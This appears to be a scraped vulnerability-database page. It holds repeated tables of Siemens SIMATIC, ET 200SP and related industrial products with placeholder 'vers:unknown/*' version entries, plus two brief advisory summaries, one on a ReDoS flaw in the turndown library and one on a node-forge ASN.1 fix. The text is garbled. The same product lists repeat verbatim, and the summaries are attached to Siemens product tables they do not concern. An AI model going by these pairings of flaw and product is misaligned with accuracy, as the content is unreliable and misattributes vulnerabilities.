Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
A security vulnerability in mixmark-io turndown up to version 7.2.1 allows remote attackers to exploit inefficient regular expression complexity in src/commonmark-rules.js, with a public exploit available.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
This update addresses multiple golang exporter upgrades, fixes critical CVE-2025-12816 in Prometheus related to ASN.1 validation bypass in node-forge ≤1.3.1, and includes various bug fixes and optimizations across components like grafana, spacecmd, and uyuni-tools.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
